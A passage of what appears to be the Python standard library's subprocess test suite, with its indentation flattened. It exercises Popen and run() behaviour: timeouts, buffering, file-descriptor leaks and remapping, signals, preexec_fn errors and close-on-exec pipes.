def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
# Some heavily loaded buildbots (sparc Debian 3.x) require this much
# time to start.
self.assertEqual(p.wait(timeout=3), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen([sys.executable, "-c", "pass"], "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen([sys.executable, "-c", "pass"], None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen([sys.executable, "-c", "pass"], bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(OSError) as c:
subprocess.Popen(['nonexisting_i_hope'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# ignore errors that indicate the command was not found
if c.exception.errno not in (errno.ENOENT, errno.EACCES):
raise c.exception
@unittest.skipIf(threading is None, "threading required")
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(['nonexisting_i_hope'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
@unittest.skipIf(threading is None, "threading required")
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=20)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen([sys.executable, "-c", 'pass'],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
[sys.executable, '-c', 'pass'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = self.run_python("import sys; sys.exit(0)", check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
@unittest.skipIf(mswindows, "POSIX specific tests")
class POSIXProcessTestCase(BaseTestCase):
def setUp(self):
super().setUp()
self._nonexistent_dir = "/_this/pa.th/does/not/exist"
def _get_chdir_exception(self):
try:
os.chdir(self._nonexistent_dir)
except OSError as e:
# This avoids hard coding the errno value or the OS perror()
# string and instead captures the exception that we want to see
# below for comparison.
desired_exception = e
desired_exception.strerror += ': ' + repr(self._nonexistent_dir)
else:
self.fail("chdir to nonexistent directory %s succeeded." %
self._nonexistent_dir)
return desired_exception
def test_exception_cwd(self):
"""Test error in the child raised in the parent for a bad cwd."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
cwd=self._nonexistent_dir)
except OSError as e:
# Test that the child process chdir failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_executable(self):
"""Test error in the child raised in the parent for a bad executable."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([sys.executable, "-c", ""],
executable=self._nonexistent_dir)
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_exception_bad_args_0(self):
"""Test error in the child raised in the parent for a bad args[0]."""
desired_exception = self._get_chdir_exception()
try:
p = subprocess.Popen([self._nonexistent_dir, "-c", ""])
except OSError as e:
# Test that the child process exec failure actually makes
# it up to the parent process as the correct exception.
self.assertEqual(desired_exception.errno, e.errno)
self.assertEqual(desired_exception.strerror, e.strerror)
else:
self.fail("Expected OSError: %s" % desired_exception)
def test_restore_signals(self):
# Code coverage for both values of restore_signals to make sure it
# at least does not blow up.
# A test for behavior would be complex. Contributions welcome.
subprocess.call([sys.executable, "-c", ""], restore_signals=True)
subprocess.call([sys.executable, "-c", ""], restore_signals=False)
def test_start_new_session(self):
# For code coverage of calling setsid(). We don't care if we get an
# EPERM error from it depending on the test execution environment, that
# still indicates that it was called.
try:
output = subprocess.check_output(
[sys.executable, "-c",
"import os; print(os.getpgid(os.getpid()))"],
start_new_session=True)
except OSError as e:
if e.errno != errno.EPERM:
raise
else:
parent_pgid = os.getpgid(os.getpid())
child_pgid = int(output)
self.assertNotEqual(parent_pgid, child_pgid)
def test_run_abort(self):
# returncode handles signal termination
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import os; os.abort()'])
p.wait()
self.assertEqual(-p.returncode, signal.SIGABRT)
def test_CalledProcessError_str_signal(self):
err = subprocess.CalledProcessError(-int(signal.SIGABRT), "fake cmd")
error_string = str(err)
# We're relying on the repr() of the signal.Signals IntEnum to provide
# the word signal, the signal name and the numeric value.
self.assertIn("signal", error_string.lower())
# We're not being specific about the signal name as some signals have
# multiple names and which name is revealed can vary.
self.assertIn("SIG", error_string)
self.assertIn(str(signal.SIGABRT), error_string)
def test_CalledProcessError_str_unknown_signal(self):
err = subprocess.CalledProcessError(-9876543, "fake cmd")
error_string = str(err)
self.assertIn("unknown signal 9876543.", error_string)
def test_CalledProcessError_str_non_zero(self):
err = subprocess.CalledProcessError(2, "fake cmd")
error_string = str(err)
self.assertIn("non-zero exit status 2.", error_string)
def test_preexec(self):
# DISCLAIMER: Setting environment variables is *not* a good use
# of a preexec_fn. This is merely a test.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
preexec_fn=lambda: os.putenv("FRUIT", "apple"))
with p:
self.assertEqual(p.stdout.read(), b"apple")
def test_preexec_exception(self):
def raise_it():
raise ValueError("What if two swallows carried a coconut?")
try:
p = subprocess.Popen([sys.executable, "-c", ""],
preexec_fn=raise_it)
except subprocess.SubprocessError as e:
self.assertTrue(
subprocess._posixsubprocess,
"Expected a ValueError from the preexec_fn")
except ValueError as e:
self.assertIn("coconut", e.args[0])
else:
self.fail("Exception raised by preexec_fn did not make it "
"to the parent process.")
class _TestExecuteChildPopen(subprocess.Popen):
"""Used to test behavior at the end of _execute_child."""
def __init__(self, testcase, *args, **kwargs):
self._testcase = testcase
subprocess.Popen.__init__(self, *args, **kwargs)
def _execute_child(self, *args, **kwargs):
try:
subprocess.Popen._execute_child(self, *args, **kwargs)
finally:
# Open a bunch of file descriptors and verify that
# none of them are the same as the ones the Popen
# instance is using for stdin/stdout/stderr.
devzero_fds = [os.open("/dev/zero", os.O_RDONLY)
for _ in range(8)]
try:
for fd in devzero_fds:
self._testcase.assertNotIn(
fd, (self.stdin.fileno(), self.stdout.fileno(),
self.stderr.fileno()),
msg="At least one fd was closed early.")
finally:
for fd in devzero_fds:
os.close(fd)
@unittest.skipIf(not os.path.exists("/dev/zero"), "/dev/zero required.")
def test_preexec_errpipe_does_not_double_close_pipes(self):
"""Issue16140: Don't double close pipes on preexec error."""
def raise_it():
raise subprocess.SubprocessError(
"force the _execute_child() errpipe_data path.")
with self.assertRaises(subprocess.SubprocessError):
self._TestExecuteChildPopen(
self, [sys.executable, "-c", "pass"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, preexec_fn=raise_it)
def test_preexec_gc_module_failure(self):
# This tests the code that disables garbage collection if the child
# process will execute any Python.
def raise_runtime_error():
raise RuntimeError("this shouldn't escape")
enabled = gc.isenabled()
orig_gc_disable = gc.disable
orig_gc_isenabled = gc.isenabled
try:
gc.disable()
self.assertFalse(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertFalse(gc.isenabled(),
"Popen enabled gc when it shouldn't.")
gc.enable()
self.assertTrue(gc.isenabled())
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
self.assertTrue(gc.isenabled(), "Popen left gc disabled.")
gc.disable = raise_runtime_error
self.assertRaises(RuntimeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
del gc.isenabled # force an AttributeError
self.assertRaises(AttributeError, subprocess.Popen,
[sys.executable, '-c', ''],
preexec_fn=lambda: None)
finally:
gc.disable = orig_gc_disable
gc.isenabled = orig_gc_isenabled
if not enabled:
gc.disable()
@unittest.skipIf(
sys.platform == 'darwin', 'setrlimit() seems to fail on OS X')
def test_preexec_fork_failure(self):
# The internal code did not preserve the previous exception when
# re-enabling garbage collection
try:
from resource import getrlimit, setrlimit, RLIMIT_NPROC
except ImportError as err:
self.skipTest(err) # RLIMIT_NPROC is specific to Linux and BSD
limits = getrlimit(RLIMIT_NPROC)
[_, hard] = limits
setrlimit(RLIMIT_NPROC, (0, hard))
self.addCleanup(setrlimit, RLIMIT_NPROC, limits)
try:
subprocess.call([sys.executable, '-c', ''],
preexec_fn=lambda: None)
except BlockingIOError:
# Forking should raise EAGAIN, translated to BlockingIOError
pass
else:
self.skipTest('RLIMIT_NPROC had no effect; probably superuser')
def test_args_string(self):
# args is a string
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
p = subprocess.Popen(fname)
p.wait()
os.remove(fname)
self.assertEqual(p.returncode, 47)
def test_invalid_args(self):
# invalid arguments should raise ValueError
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
startupinfo=47)
self.assertRaises(ValueError, subprocess.call,
[sys.executable, "-c",
"import sys; sys.exit(47)"],
creationflags=47)
def test_shell_sequence(self):
# Run command through the shell (sequence)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen(["echo $FRUIT"], shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_shell_string(self):
# Run command through the shell (string)
newenv = os.environ.copy()
newenv["FRUIT"] = "apple"
p = subprocess.Popen("echo $FRUIT", shell=1,
stdout=subprocess.PIPE,
env=newenv)
with p:
self.assertEqual(p.stdout.read().strip(b" \t\r\n\f"), b"apple")
def test_call_string(self):
# call() function with string argument on UNIX
fd, fname = tempfile.mkstemp()
# reopen in text mode
with open(fd, "w", errors="surrogateescape") as fobj:
fobj.write("#!%s\n" % support.unix_shell)
fobj.write("exec '%s' -c 'import sys; sys.exit(47)'\n" %
sys.executable)
os.chmod(fname, 0o700)
rc = subprocess.call(fname)
os.remove(fname)
self.assertEqual(rc, 47)
def test_specific_shell(self):
# Issue #9265: Incorrect name passed as arg[0].
shells = []
for prefix in ['/bin', '/usr/bin/', '/usr/local/bin']:
for name in ['bash', 'ksh']:
sh = os.path.join(prefix, name)
if os.path.isfile(sh):
shells.append(sh)
if not shells: # Will probably work for any shell but csh.
self.skipTest("bash or ksh required for this test")
sh = '/bin/sh'
if os.path.isfile(sh) and not os.path.islink(sh):
# Test will fail if /bin/sh is a symlink to csh.
shells.append(sh)
for sh in shells:
p = subprocess.Popen("echo $0", executable=sh, shell=True,
stdout=subprocess.PIPE)
with p:
self.assertEqual(p.stdout.read().strip(), bytes(sh, 'ascii'))
def _kill_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
# Also set the SIGINT handler to the default to make sure it's not
# being ignored (some tests rely on that.)
old_handler = signal.signal(signal.SIGINT, signal.default_int_handler)
try:
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
time.sleep(30)
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
signal.signal(signal.SIGINT, old_handler)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
getattr(p, method)(*args)
return p
@unittest.skipIf(sys.platform.startswith(('netbsd', 'openbsd')),
"Due to known OS bug (issue #16762)")
def _kill_dead_process(self, method, *args):
# Do not inherit file handles from the parent.
# It should fix failures on some platforms.
p = subprocess.Popen([sys.executable, "-c", """if 1:
import sys, time
sys.stdout.write('x\\n')
sys.stdout.flush()
"""],
close_fds=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
# Wait for the interpreter to be completely initialized before
# sending any signal.
p.stdout.read(1)
# The process should end after this
time.sleep(1)
# This shouldn't raise even though the child is now dead
getattr(p, method)(*args)
p.communicate()
def test_send_signal(self):
p = self._kill_process('send_signal', signal.SIGINT)
_, stderr = p.communicate()
self.assertIn(b'KeyboardInterrupt', stderr)
self.assertNotEqual(p.wait(), 0)
def test_kill(self):
p = self._kill_process('kill')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGKILL)
def test_terminate(self):
p = self._kill_process('terminate')
_, stderr = p.communicate()
self.assertStderrEqual(stderr, b'')
self.assertEqual(p.wait(), -signal.SIGTERM)
def test_send_signal_dead(self):
# Sending a signal to a dead process
self._kill_dead_process('send_signal', signal.SIGINT)
def test_kill_dead(self):
# Killing a dead process
self._kill_dead_process('kill')
def test_terminate_dead(self):
# Terminating a dead process
self._kill_dead_process('terminate')
def _save_fds(self, save_fds):
fds = []
for fd in save_fds:
inheritable = os.get_inheritable(fd)
saved = os.dup(fd)
fds.append((fd, saved, inheritable))
return fds
def _restore_fds(self, fds):
for fd, saved, inheritable in fds:
os.dup2(saved, fd, inheritable=inheritable)
os.close(saved)
def check_close_std_fds(self, fds):
# Issue #9905: test that subprocess pipes still work properly with
# some standard fds closed
stdin = 0
saved_fds = self._save_fds(fds)
for fd, saved, inheritable in saved_fds:
if fd == 0:
stdin = saved
break
try:
for fd in fds:
os.close(fd)
out, err = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdout.write("apple");'
'sys.stdout.flush();'
'sys.stderr.write("orange")'],
stdin=stdin,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
err = support.strip_python_stderr(err)
self.assertEqual((out, err), (b'apple', b'orange'))
finally:
self._restore_fds(saved_fds)
def test_close_fd_0(self):
self.check_close_std_fds([0])
def test_close_fd_1(self):
self.check_close_std_fds([1])
def test_close_fd_2(self):
self.check_close_std_fds([2])
def test_close_fds_0_1(self):
self.check_close_std_fds([0, 1])
def test_close_fds_0_2(self):
self.check_close_std_fds([0, 2])
def test_close_fds_1_2(self):
self.check_close_std_fds([1, 2])
def test_close_fds_0_1_2(self):
# Issue #10806: test that subprocess pipes still work properly with
# all standard fds closed.
self.check_close_std_fds([0, 1, 2])
def test_small_errpipe_write_fd(self):
"""Issue #15798: Popen should work when stdio fds are available."""
new_stdin = os.dup(0)
new_stdout = os.dup(1)
try:
os.close(0)
os.close(1)
# Side test: if errpipe_write fails to have its CLOEXEC
# flag set this should cause the parent to think the exec
# failed. Extremely unlikely: everyone supports CLOEXEC.
subprocess.Popen([
sys.executable, "-c",
"print('AssertionError:0:CLOEXEC failure.')"]).wait()
finally:
# Restore original stdin and stdout
os.dup2(new_stdin, 0)
os.dup2(new_stdout, 1)
os.close(new_stdin)
os.close(new_stdout)
def test_remapping_std_fds(self):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
try:
temp_fds = [fd for fd, fname in temps]
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# write some data to what will become stdin, and rewind
os.write(temp_fds[1], b"STDIN")
os.lseek(temp_fds[1], 0, 0)
# move the standard file descriptors out of the way
saved_fds = self._save_fds(range(3))
try:
# duplicate the file objects over the standard fd's
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# now use those files in the "wrong" order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=temp_fds[1],
stdout=temp_fds[2],
stderr=temp_fds[0])
p.wait()
finally:
self._restore_fds(saved_fds)
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(temp_fds[2], 1024)
err = support.strip_python_stderr(os.read(temp_fds[0], 1024))
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
def check_swap_fds(self, stdin_no, stdout_no, stderr_no):
# open up some temporary files
temps = [tempfile.mkstemp() for i in range(3)]
temp_fds = [fd for fd, fname in temps]
try:
# unlink the files -- we won't need to reopen them
for fd, fname in temps:
os.unlink(fname)
# save a copy of the standard file descriptors
saved_fds = self._save_fds(range(3))
try:
# duplicate the temp files over the standard fd's 0, 1, 2
for fd, temp_fd in enumerate(temp_fds):
os.dup2(temp_fd, fd)
# write some data to what will become stdin, and rewind
os.write(stdin_no, b"STDIN")
os.lseek(stdin_no, 0, 0)
# now use those files in the given order, so that subprocess
# has to rearrange them in the child
p = subprocess.Popen([sys.executable, "-c",
'import sys; got = sys.stdin.read();'
'sys.stdout.write("got %s"%got); sys.stderr.write("err")'],
stdin=stdin_no,
stdout=stdout_no,
stderr=stderr_no)
p.wait()
for fd in temp_fds:
os.lseek(fd, 0, 0)
out = os.read(stdout_no, 1024)
err = support.strip_python_stderr(os.read(stderr_no, 1024))
finally:
self._restore_fds(saved_fds)
self.assertEqual(out, b"got STDIN")
self.assertEqual(err, b"err")
finally:
for fd in temp_fds:
os.close(fd)
# When duping fds, if one of the target fds is 0, 1 or 2, it is
# possible that it gets overwritten prematurely (#12607).
# This tests all combinations of this.
def test_swap_fds(self):
self.check_swap_fds(0, 1, 2)
self.check_swap_fds(0, 2, 1)
self.check_swap_fds(1, 0, 2)
self.check_swap_fds(1, 2, 0)
self.check_swap_fds(2, 0, 1)
self.check_swap_fds(2, 1, 0)
def test_surrogates_error_message(self):
def prepare():
raise ValueError("surrogate:\uDCff")
try:
subprocess.call(
[sys.executable, "-c", "pass"],
preexec_fn=prepare)
except ValueError as err:
# The pure Python implementation keeps the message
self.assertIsNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "surrogate:\uDCff")
except subprocess.SubprocessError as err:
# _posixsubprocess uses a default message
self.assertIsNotNone(subprocess._posixsubprocess)
self.assertEqual(str(err), "Exception occurred in preexec_fn.")
else:
self.fail("Expected ValueError or subprocess.SubprocessError")
def test_undecodable_env(self):
for key, value in (('test', 'abc\uDCFF'), ('test\uDCFF', '42')):
encoded_value = value.encode("ascii", "surrogateescape")
# test str with surrogates
script = "import os; print(ascii(os.getenv(%s)))" % repr(key)
env = os.environ.copy()
env[key] = value
# Use C locale to get ASCII for the locale encoding to force
# surrogate-escaping of \xFF in the child process; otherwise it can
# be decoded as-is if the default locale is latin-1.
env['LC_ALL'] = 'C'
if sys.platform.startswith("aix"):
# On AIX, the C locale uses the Latin1 encoding
decoded_value = encoded_value.decode("latin1", "surrogateescape")
else:
# On other UNIXes, the C locale uses the ASCII encoding
decoded_value = value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(decoded_value))
# test bytes
key = key.encode("ascii", "surrogateescape")
script = "import os; print(ascii(os.getenvb(%s)))" % repr(key)
env = os.environ.copy()
env[key] = encoded_value
stdout = subprocess.check_output(
[sys.executable, "-c", script],
env=env)
stdout = stdout.rstrip(b'\n\r')
self.assertEqual(stdout.decode('ascii'), ascii(encoded_value))
def test_bytes_program(self):
abs_program = os.fsencode(sys.executable)
path, program = os.path.split(sys.executable)
program = os.fsencode(program)
# absolute bytes path
exitcode = subprocess.call([abs_program, "-c", "pass"])
self.assertEqual(exitcode, 0)
# absolute bytes path as a string
cmd = b"'" + abs_program + b"' -c pass"
exitcode = subprocess.call(cmd, shell=True)
self.assertEqual(exitcode, 0)
# bytes program, unicode PATH
env = os.environ.copy()
env["PATH"] = path
exitcode = subprocess.call([program, "-c", "pass"], env=env)
self.assertEqual(exitcode, 0)
# bytes program, bytes PATH
envb = os.environb.copy()
envb[b"PATH"] = os.fsencode(path)
exitcode = subprocess.call([program, "-c", "pass"], env=envb)
self.assertEqual(exitcode, 0)
def test_pipe_cloexec(self):
sleeper = support.findfile("input_reader.py", subdir="subprocessdata")
fd_status = support.findfile("fd_status.py", subdir="subprocessdata")
p1 = subprocess.Popen([sys.executable, sleeper],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, close_fds=False)
self.addCleanup(p1.communicate, b'')
p2 = subprocess.Popen([sys.executable, fd_status],
stdout=subprocess.PIPE, close_fds=False)
output, error = p2.communicate()
result_fds = set(map(int, output.split(b',')))
unwanted_fds = set([p1.stdin.fileno(), p1.stdout.fileno(),
p1.stderr.fileno()])
self.assertFalse(result_fds & unwanted_fds,
"Expected no fds from %r to be open in child, "
"found %r" %
(unwanted_fds, result_fds & unwanted_fds))
def test_pipe_cloexec_real_tools(self):
qcat = support.findfile("qcat.py", subdir="subprocessdata")
qgrep = support.findfile("qgrep.py", subdir="subprocessdata")
subdata = b'zxcvbn'
data = subdata * 4 + b'\n'
p1 = subprocess.Popen([sys.executable, qcat],
stdin=subprocess.PIPE, stdout=subprocess.PIPE,
close_fds=False)
p2 = subprocess.Popen([sys.executable, qgrep, subdata],
stdin=p1.stdout, stdout=subprocess.PIPE,
close_fds=False)
self.addCleanup(p1.wait)
self.addCleanup(p2.wait)
def kill_p1():
try:
p1.terminate()
except ProcessLookupError:
pass
def kill_p2():
try:
p2.terminate()
